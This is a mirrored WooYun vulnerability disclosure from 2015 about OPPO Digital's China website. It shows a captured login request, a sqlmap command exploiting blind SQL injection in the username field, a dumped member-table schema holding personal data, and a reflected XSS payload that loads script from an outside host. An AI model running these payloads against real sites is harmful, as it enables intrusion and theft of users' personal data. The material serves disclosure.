乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-02-10: 细节已通知厂商并且等待厂商处理中 2015-02-15: 厂商已经主动忽略漏洞,细节向公众公开
存在sql注入点和反射xss
username参数存在post注入,在登陆框随便提交数据抓取数据包如下:<code>POST /club_login.php HTTP/1.1Host: www.oppodigital.com.cnUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.oppodigital.com.cn/club_login.phpCookie: pgv_pvi=7487544320; __utma=42439803.2032898508.1423192596.1423192596.1423201653.2; __utmz=42439803.1423192596.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=3qdpr4hg9eqpam1rp4grvum5h1; pgv_si=s2809327616; __utmb=42439803.2.10.1423201653; __utmc=42439803Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 63username=admin&password=admin&act=club&login=%E7%99%BB%E5%BD%95
http://www.oppodigital.com.cn//showroom.php?act=get_store&sell_district_id=1
sqlmap跑,盲注。
注入代码sqlmap.py -r 注入的数据包 -p username --dbs --level 3
Database: oppo_storeTable: bd_club_user[24 columns]+-------------------+------------------+| Column | Type |+-------------------+------------------+| address | varchar(512) || birthday | datetime || city | varchar(128) || connection_type | varchar(512) || dateline | int(10) unsigned || e_mail | varchar(512) || education | varchar(128) || marriage_status | char(1) || media | varchar(512) || mobile_phone | varchar(32) || password | varchar(64) || personal_income | varchar(128) || profession | varchar(128) || province | varchar(128) || purchase_reason | varchar(512) || recommended_email | varchar(512) || sex | char(1) || status | char(1) || tel_phone | varchar(32) || true_name | varchar(128) || type | varchar(512) || u_id | int(10) unsigned || user_name | varchar(128) || zipcode | varchar(16) |+-------------------+------------------+
http://www.oppodigital.com.cn/club_login.php
post提交数据act=club&login=%e7%99%bb%e5%bd%95&password=acUn3t1x&username="/><script src=http://t.cn/RwzPqom></script>
过滤...
危害等级:无影响厂商忽略
忽略时间:2015-02-15 12:08
暂无